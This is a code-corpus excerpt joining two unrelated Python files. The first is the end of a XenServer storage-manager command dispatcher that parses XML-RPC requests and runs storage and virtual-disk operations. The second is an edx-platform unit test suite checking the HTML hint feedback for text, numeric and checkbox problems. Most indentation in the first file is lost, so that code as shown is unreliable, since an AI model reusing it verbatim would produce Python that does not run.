"sr_scan" : "SRScan",
"vdi_init" : "VDILoad",
"vdi_create" : "VDICreate",
"vdi_delete" : "VDIDelete",
"vdi_attach" : "VDIUnavailable",
"vdi_detach" : "VDIUnavailable",
"vdi_activate" : "VDIUnavailable",
"vdi_deactivate" : "VDIUnavailable",
"vdi_resize" : "VDIResize",
"vdi_resize_online" : "VDIResize",
"vdi_snapshot" : "VDISnapshot",
"vdi_clone" : "VDIClone",
}
class SRCommand:
def __init__(self, driver_info):
self.dconf = ''
self.type = ''
self.sr_uuid = ''
self.cmdname = ''
self.cmdtype = ''
self.cmd = None
self.args = None
self.driver_info = driver_info
def parse(self):
        if len(sys.argv) != 2:
util.SMlog("Failed to parse commandline; wrong number of arguments; argv = %s" % (repr(sys.argv)))
raise xs_errors.XenError('BadRequest')
# Debug logging of the actual incoming command from the caller.
# util.SMlog( "" )
# util.SMlog( "SM.parse: DEBUG: args = %s,\n%s" % \
# ( sys.argv[0], \
# util.splitXmlText( util.hideMemberValuesInXmlParams( \
# sys.argv[1] ), showContd=True ) ), \
# priority=syslog.LOG_DEBUG )
try:
params, methodname = xmlrpclib.loads(sys.argv[1])
self.cmd = methodname
params = params[0] # expect a single struct
self.params = params
# params is a dictionary
self.dconf = params['device_config']
if params.has_key('sr_uuid'):
self.sr_uuid = params['sr_uuid']
if params.has_key('vdi_uuid'):
self.vdi_uuid = params['vdi_uuid']
elif self.cmd == "vdi_create":
self.vdi_uuid = util.gen_uuid ()
except Exception, e:
util.SMlog("Failed to parse commandline; exception = %s argv = %s" % (str(e), repr(sys.argv)))
raise xs_errors.XenError('BadRequest')
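    # Illustrative payload (hypothetical values, not from the original
    # source): sys.argv[1] carries an XML-RPC call, roughly the output of
    #   xmlrpclib.dumps(({'command': 'vdi_attach',
    #                     'sr_uuid': '<sr uuid>',
    #                     'vdi_uuid': '<vdi uuid>',
    #                     'device_config': {...},
    #                     'args': ['true']},), 'vdi_attach')
    # so parse() recovers the method name and a single parameter struct.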
def run_statics(self):
if self.params['command'] == 'sr_get_driver_info':
print util.sr_get_driver_info(self.driver_info)
sys.exit(0)
def run(self, sr):
try:
return self._run_locked(sr)
except (util.CommandException, util.SMException, XenAPI.Failure), e:
util.logException(self.cmd)
msg = str(e)
if isinstance(e, util.CommandException):
msg = "Command %s failed (%s): %s" % \
(e.cmd, e.reason, os.strerror(abs(e.code)))
excType = EXCEPTION_TYPE.get(self.cmd)
if not excType:
excType = "SMGeneral"
raise xs_errors.XenError(excType, opterr=msg)
except blktap2.TapdiskFailed, e:
util.logException('tapdisk failed exception: %s' % e)
raise xs_errors.XenError('TapdiskFailed',
os.strerror(e.get_error().get_error_code()))
except blktap2.TapdiskExists, e:
util.logException('tapdisk exists exception: %s' % e)
raise xs_errors.XenError('TapdiskAlreadyRunning', e.__str__())
except:
util.logException('generic exception: %s' % self.cmd)
raise
def _run_locked(self, sr):
lockSR = False
lockInitOnly = False
rv = None
e = None
if self.cmd in sr.ops_exclusive:
lockSR = True
elif self.cmd in NEEDS_VDI_OBJECT and "vdi_init" in sr.ops_exclusive:
lockInitOnly = True
target = None
acquired = False
if lockSR or lockInitOnly:
sr.lock.acquire()
acquired = True
try:
try:
if self.cmd in NEEDS_VDI_OBJECT:
target = sr.vdi(self.vdi_uuid)
finally:
if acquired and lockInitOnly:
sr.lock.release()
acquired = False
try:
rv = self._run(sr, target)
except Exception, e:
raise
finally:
if acquired:
sr.lock.release()
try:
sr.cleanup()
except Exception, e1:
msg = 'failed to clean up SR: %s' % e1
if not e:
util.SMlog(msg)
raise e1
else:
util.SMlog('WARNING: %s (error ignored)' % msg)
return rv
def _run(self, sr, target):
dconf_type = sr.dconf.get("type")
if not dconf_type or not NO_LOGGING.get(dconf_type) or \
not self.cmd in NO_LOGGING[dconf_type]:
if 'device_config' in self.params:
util.SMlog("%s %s" % (self.cmd, util.hidePasswdInParams(self.params,'device_config')))
else:
util.SMlog("%s %s" % (self.cmd, repr(self.params)))
caching_params = dict((k, self.params.get(k)) for k in \
[blktap2.VDI.CONF_KEY_ALLOW_CACHING,
blktap2.VDI.CONF_KEY_MODE_ON_BOOT,
blktap2.VDI.CONF_KEY_CACHE_SR,
blktap2.VDI.CONF_KEY_O_DIRECT])
if self.cmd == 'vdi_create':
# These are the fields owned by the backend, passed on the
# commandline:
# LVM SRs store their metadata in XML format. XML does not support
# all unicode characters, so we must check if the label or the
# description contain such characters. We must enforce this
# restriction to other SRs as well (even if they do allow these
# characters) in order to be consistent.
target.label = self.params['args'][1]
target.description = self.params['args'][2]
if not util.isLegalXMLString(target.label) \
or not util.isLegalXMLString(target.description):
raise xs_errors.XenError('IllegalXMLChar', \
opterr = 'The name and/or description you supplied contains one or more unsupported characters. The name and/or description must contain valid XML characters. See http://www.w3.org/TR/2004/REC-xml-20040204/#charsets for more information.')
target.ty = self.params['vdi_type']
target.metadata_of_pool = self.params['args'][3]
target.is_a_snapshot = self.params['args'][4] == "true"
target.snapshot_time = self.params['args'][5]
target.snapshot_of = self.params['args'][6]
target.read_only = self.params['args'][7] == "true"
return target.create(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
elif self.cmd == 'vdi_update':
# Check for invalid XML characters, similar to VDI.create right
# above.
vdi_ref = sr.session.xenapi.VDI.get_by_uuid(self.vdi_uuid)
name_label = sr.session.xenapi.VDI.get_name_label(vdi_ref)
description = sr.session.xenapi.VDI.get_name_description(vdi_ref)
if not util.isLegalXMLString(name_label) \
or not util.isLegalXMLString(description):
raise xs_errors.XenError('IllegalXMLChar', \
opterr = 'The name and/or description you supplied contains one or more unsupported characters. The name and/or description must contain valid XML characters. See http://www.w3.org/TR/2004/REC-xml-20040204/#charsets for more information.')
return target.update(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_introduce':
target = sr.vdi(self.params['new_uuid'])
return target.introduce(self.params['sr_uuid'], self.params['new_uuid'])
elif self.cmd == 'vdi_delete':
return target.delete(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_attach':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
writable = self.params['args'][0] == 'true'
return target.attach(self.params['sr_uuid'], self.vdi_uuid, writable)
elif self.cmd == 'vdi_detach':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.detach(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_snapshot':
return target.snapshot(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_clone':
return target.clone(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_resize':
return target.resize(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
elif self.cmd == 'vdi_resize_online':
return target.resize_online(self.params['sr_uuid'], self.vdi_uuid, long(self.params['args'][0]))
elif self.cmd == 'vdi_activate':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
writable = self.params['args'][0] == 'true'
return target.activate(self.params['sr_uuid'], self.vdi_uuid,
writable, caching_params)
elif self.cmd == 'vdi_deactivate':
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.deactivate(self.params['sr_uuid'], self.vdi_uuid,
caching_params)
elif self.cmd == 'vdi_epoch_begin':
if caching_params.get(blktap2.VDI.CONF_KEY_MODE_ON_BOOT) != "reset":
return
if not "VDI_RESET_ON_BOOT/2" in self.driver_info['capabilities']:
raise xs_errors.XenError('Unimplemented')
return target.reset_leaf(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_epoch_end':
return
elif self.cmd == 'vdi_generate_config':
return target.generate_config(self.params['sr_uuid'], self.vdi_uuid)
elif self.cmd == 'vdi_compose':
vdi1_uuid = sr.session.xenapi.VDI.get_uuid(self.params['args'][0])
return target.compose(self.params['sr_uuid'], vdi1_uuid, self.vdi_uuid)
elif self.cmd == 'vdi_attach_from_config':
ret = target.attach_from_config(self.params['sr_uuid'], self.vdi_uuid)
if not target.sr.driver_config.get("ATTACH_FROM_CONFIG_WITH_TAPDISK"):
return ret
target = blktap2.VDI(self.vdi_uuid, target, self.driver_info)
return target.attach(self.params['sr_uuid'], self.vdi_uuid, True, True)
elif self.cmd == 'sr_create':
return sr.create(self.params['sr_uuid'], long(self.params['args'][0]))
elif self.cmd == 'sr_delete':
return sr.delete(self.params['sr_uuid'])
elif self.cmd == 'sr_update':
return sr.update(self.params['sr_uuid'])
elif self.cmd == 'sr_probe':
txt = sr.probe()
util.SMlog( "sr_probe result: %s" % util.splitXmlText( txt, showContd=True ) )
# return the XML document as a string
return xmlrpclib.dumps((txt,), "", True)
elif self.cmd == 'sr_attach':
is_master = False
if sr.dconf.get("SRmaster") == "true":
is_master = True
resetvdis.reset_sr(sr.session, util.get_this_host(),
self.params['sr_uuid'], is_master)
if is_master:
# Schedule a scan only when attaching on the SRmaster
util.set_dirty(sr.session, self.params["sr_ref"])
return sr.attach(self.params['sr_uuid'])
elif self.cmd == 'sr_detach':
return sr.detach(self.params['sr_uuid'])
elif self.cmd == 'sr_content_type':
return sr.content_type(self.params['sr_uuid'])
elif self.cmd == 'sr_scan':
return sr.scan(self.params['sr_uuid'])
else:
util.SMlog("Unknown command: %s" % self.cmd)
raise xs_errors.XenError('BadRequest')
def run(driver, driver_info):
"""Convenience method to run command on the given driver"""
cmd = SRCommand(driver_info)
try:
cmd.parse()
cmd.run_statics()
sr = driver(cmd, cmd.sr_uuid)
sr.direct = True
ret = cmd.run(sr)
        if ret is None:
            print util.return_nil()
else:
print ret
except Exception, e:
try:
util.logException(driver_info['name'])
except KeyError:
util.SMlog('driver_info does not contain a \'name\' key.')
except:
pass
# If exception is of type SR.SRException,
# pass to xapi, else re-raise.
if isinstance(e, SR.SRException):
print e.toxml()
else:
raise
sys.exit(0)
| lgpl-2.1 |
don-github/edx-platform | common/lib/capa/capa/tests/test_hint_functionality.py | 41 | 34139 | # -*- coding: utf-8 -*-
"""
Tests of extended hints
"""
import unittest
from ddt import ddt, data, unpack
# With the use of ddt, some of the data expected_string cases below are naturally long stretches
# of text without whitespace. I think it's best to leave such lines intact
# in the test code. Therefore:
# pylint: disable=line-too-long
# For our many ddt data cases, prefer a compact form of { .. }
# pylint: disable=bad-continuation
from . import new_loncapa_problem, load_fixture
class HintTest(unittest.TestCase):
"""Base class for tests of extended hinting functionality."""
def correctness(self, problem_id, choice):
"""Grades the problem and returns the 'correctness' string from cmap."""
student_answers = {problem_id: choice}
cmap = self.problem.grade_answers(answers=student_answers) # pylint: disable=no-member
return cmap[problem_id]['correctness']
def get_hint(self, problem_id, choice):
"""Grades the problem and returns its hint from cmap or the empty string."""
student_answers = {problem_id: choice}
cmap = self.problem.grade_answers(answers=student_answers) # pylint: disable=no-member
adict = cmap.cmap.get(problem_id)
if adict:
return adict['msg']
else:
return ''
# It is a little surprising how much more complicated TextInput is than all the other cases.
@ddt
class TextInputHintsTest(HintTest):
"""
    Test extended hints for text input problems.
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test that the tracking log comes out right."""
self.problem.capa_module.reset_mock()
self.get_hint(u'1_3_1', u'Blue')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_2',
'trigger_type': 'single',
'hint_label': u'Correct',
'correctness': True,
'student_answer': [u'Blue'],
'question_type': 'stringresponse',
'hints': [{'text': 'The red light is scattered by water molecules leaving only blue light.'}]}
)
@data(
{'problem_id': u'1_2_1', u'choice': u'GermanyΩ',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">I do not think so.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'franceΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Viva la France!Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'FranceΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Viva la France!Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'Mexico',
'expected_string': ''},
{'problem_id': u'1_2_1', u'choice': u'USAΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Less well known, but yes, there is a Paris, Texas.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'usaΩ',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Less well known, but yes, there is a Paris, Texas.Ω</div></div>'},
{'problem_id': u'1_2_1', u'choice': u'uSAxΩ',
'expected_string': u''},
{'problem_id': u'1_2_1', u'choice': u'NICKLANDΩ',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">The country name does not end in LANDΩ</div></div>'},
{'problem_id': u'1_3_1', u'choice': u'Blue',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">The red light is scattered by water molecules leaving only blue light.</div></div>'},
{'problem_id': u'1_3_1', u'choice': u'blue',
'expected_string': u''},
{'problem_id': u'1_3_1', u'choice': u'b',
'expected_string': u''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class TextInputExtendedHintsCaseInsensitive(HintTest):
"""Test Text Input Extended hints Case Insensitive"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_5_1', 'choice': 'abc', 'expected_string': ''}, # wrong answer yielding no hint
{'problem_id': u'1_5_1', 'choice': 'A', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Woo Hoo: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'a', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Woo Hoo: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'B', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'b', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'C', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'c', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint4</div></div>'},
# regexp cases
{'problem_id': u'1_5_1', 'choice': 'FGGG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_5_1', 'choice': 'fgG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-text">hint6</div></div>'},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class TextInputExtendedHintsCaseSensitive(HintTest):
"""Sometimes the semantics can be encoded in the class name."""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_6_1', 'choice': 'abc', 'expected_string': ''},
{'problem_id': u'1_6_1', 'choice': 'A', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'a', 'expected_string': u''},
{'problem_id': u'1_6_1', 'choice': 'B', 'expected_string':
u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'b', 'expected_string': u''},
{'problem_id': u'1_6_1', 'choice': 'C', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'c', 'expected_string': u''},
# regexp cases
{'problem_id': u'1_6_1', 'choice': 'FGG', 'expected_string':
u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_6_1', 'choice': 'fgG', 'expected_string': u''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
@ddt
class TextInputExtendedHintsCompatible(HintTest):
"""
Compatibility test with mixed old and new style additional_answer tags.
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_7_1', 'choice': 'A', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_7_1', 'choice': 'B', 'correct': 'correct', 'expected_string': ''},
{'problem_id': u'1_7_1', 'choice': 'C', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_7_1', 'choice': 'D', 'correct': 'incorrect', 'expected_string': ''},
# check going through conversion with difficult chars
{'problem_id': u'1_7_1', 'choice': """<&"'>""", 'correct': 'correct', 'expected_string': ''},
)
@unpack
def test_text_input_hints(self, problem_id, choice, correct, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
self.assertEqual(self.correctness(problem_id, choice), correct)
@ddt
class TextInputExtendedHintsRegex(HintTest):
"""
Extended hints where the answer is regex mode.
"""
xml = load_fixture('extended_hints_text_input.xml')
problem = new_loncapa_problem(xml)
@data(
{'problem_id': u'1_8_1', 'choice': 'ABwrong', 'correct': 'incorrect', 'expected_string': ''},
{'problem_id': u'1_8_1', 'choice': 'ABC', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'ABBBBC', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'aBc', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint1</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'BBBB', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'bbb', 'correct': 'correct',
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">hint2</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'C', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'c', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint4</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'D', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
{'problem_id': u'1_8_1', 'choice': 'd', 'correct': 'incorrect',
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">hint6</div></div>'},
)
@unpack
def test_text_input_hints(self, problem_id, choice, correct, expected_string):
message_text = self.get_hint(problem_id, choice)
self.assertEqual(message_text, expected_string)
self.assertEqual(self.correctness(problem_id, choice), correct)
@ddt
class NumericInputHintsTest(HintTest):
"""
    This class consists of a suite of test cases to be run on the numeric input problem loaded from the fixture XML.
"""
xml = load_fixture('extended_hints_numeric_input.xml')
problem = new_loncapa_problem(xml) # this problem is properly constructed
def test_tracking_log(self):
self.get_hint(u'1_2_1', u'1.141')
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'module_id': 'i4x://Foo/bar/mock/abc', 'problem_part_id': '1_1', 'trigger_type': 'single',
'hint_label': u'Nice',
'correctness': True,
'student_answer': [u'1.141'],
'question_type': 'numericalresponse',
'hints': [{'text': 'The square root of two turns up in the strangest places.'}]}
)
@data(
{'problem_id': u'1_2_1', 'choice': '1.141',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Nice: </div><div class="hint-text">The square root of two turns up in the strangest places.</div></div>'},
{'problem_id': u'1_3_1', 'choice': '4',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">Pretty easy, uh?.</div></div>'},
        # should get the hint when correct via numeric tolerance
{'problem_id': u'1_2_1', 'choice': '1.15',
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Nice: </div><div class="hint-text">The square root of two turns up in the strangest places.</div></div>'},
# when they answer wrong, nothing
{'problem_id': u'1_2_1', 'choice': '2', 'expected_string': ''},
)
@unpack
def test_numeric_input_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
@ddt
class CheckboxHintsTest(HintTest):
"""
    This class consists of a suite of test cases to be run on the checkbox problem loaded from the fixture XML.
"""
xml = load_fixture('extended_hints_checkbox.xml')
problem = new_loncapa_problem(xml) # this problem is properly constructed
@data(
{'problem_id': u'1_2_1', 'choice': [u'choice_0'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">You are right that apple is a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_1'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">Mushroom is a fungus, not a fruit.</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">You are right that grape is a fruit</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_3'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_4'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">Remember that apple is also a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">Remember that grape is also a fruit.</div><div class="hint-text">I do not know what a Camero is but it is not a fruit.</div></div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Almost right: </div><div class="hint-text">You are right that apple is a fruit, but there is one you are missing. Also, mushroom is not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_1', u'choice_2'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">You are right that grape is a fruit, but there is one you are missing. Also, mushroom is not a fruit.</div></div>'},
{'problem_id': u'1_2_1', 'choice': [u'choice_0', u'choice_2'],
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">You are right that apple is a fruit.</div><div class="hint-text">You are right that mushrooms are not fruit</div><div class="hint-text">You are right that grape is a fruit</div><div class="hint-text">What is a camero anyway?</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">No, sorry, a banana is a fruit.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_1'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_3'],
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">You are right that mushrooms are not vegatbles</div><div class="hint-text">Brussel sprouts are vegetables.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Very funny: </div><div class="hint-text">Making a banana split?</div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_1', u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">poor banana.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
{'problem_id': u'1_3_1', 'choice': [u'choice_0', u'choice_2'],
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">No, sorry, a banana is a fruit.</div><div class="hint-text">Mushroom is a fungus, not a vegetable.</div><div class="hint-text">Brussel sprout is the only vegetable in this list.</div></div></div>'},
# check for interaction between compoundhint and correct/incorrect
{'problem_id': u'1_4_1', 'choice': [u'choice_0', u'choice_1'], # compound
'expected_string': u'<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="hint-text">AB</div></div>'},
{'problem_id': u'1_4_1', 'choice': [u'choice_0', u'choice_2'], # compound
'expected_string': u'<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">AC</div></div>'},
# check for labeling where multiple child hints have labels
# These are some tricky cases
{'problem_id': '1_5_1', 'choice': ['choice_0', 'choice_1'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">AA: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div></div></div>'},
{'problem_id': '1_5_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div><div class="hint-text">bb</div></div></div>'},
{'problem_id': '1_5_1', 'choice': ['choice_1'],
'expected_string': ''},
{'problem_id': '1_5_1', 'choice': [],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">BB: </div><div class="feedback-hint-multi"><div class="hint-text">bb</div></div></div>'},
{'problem_id': '1_6_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-incorrect"><div class="feedback-hint-multi"><div class="hint-text">aa</div></div></div>'},
{'problem_id': '1_6_1', 'choice': ['choice_0', 'choice_1'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-text">compoundo</div></div>'},
# The user selects *nothing*, but can still get "unselected" feedback
{'problem_id': '1_7_1', 'choice': [],
'expected_string': '<div class="feedback-hint-incorrect"><div class="hint-label">Incorrect: </div><div class="feedback-hint-multi"><div class="hint-text">bb</div></div></div>'},
        # no selected/unselected feedback matches this particular selection
{'problem_id': '1_7_1', 'choice': ['choice_1'],
'expected_string': ''},
# Here we have the correct combination, and that makes feedback too
{'problem_id': '1_7_1', 'choice': ['choice_0'],
'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="feedback-hint-multi"><div class="hint-text">aa</div><div class="hint-text">bb</div></div></div>'},
)
@unpack
def test_checkbox_hints(self, problem_id, choice, expected_string):
self.maxDiff = None # pylint: disable=invalid-name
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
class CheckboxHintsTestTracking(HintTest):
"""
Test the rather complicated tracking log output for checkbox cases.
"""
xml = """
<problem>
<p>question</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Apple
<choicehint selected="true">A true</choicehint>
<choicehint selected="false">A false</choicehint>
</choice>
<choice correct="false">Banana
</choice>
<choice correct="true">Cronut
<choicehint selected="true">C true</choicehint>
</choice>
<compoundhint value="A C">A C Compound</compoundhint>
</checkboxgroup>
</choiceresponse>
</problem>
"""
problem = new_loncapa_problem(xml)
def test_tracking_log(self):
"""Test checkbox tracking log - by far the most complicated case"""
# A -> 1 hint
self.get_hint(u'1_2_1', [u'choice_0'])
self.problem.capa_module.runtime.track_function.assert_called_with(
'edx.problem.hint.feedback_displayed',
{'hint_label': u'Incorrect',
'module_id': 'i4x://Foo/bar/mock/abc',
'problem_part_id': '1_1',
'choice_all': ['choice_0', 'choice_1', 'choice_2'],
'correctness': False,
'trigger_type': 'single',
'student_answer': [u'choice_0'],
'hints': [{'text': 'A true', 'trigger': [{'choice': 'choice_0', 'selected': True}]}],
'question_type': 'choiceresponse'}
)
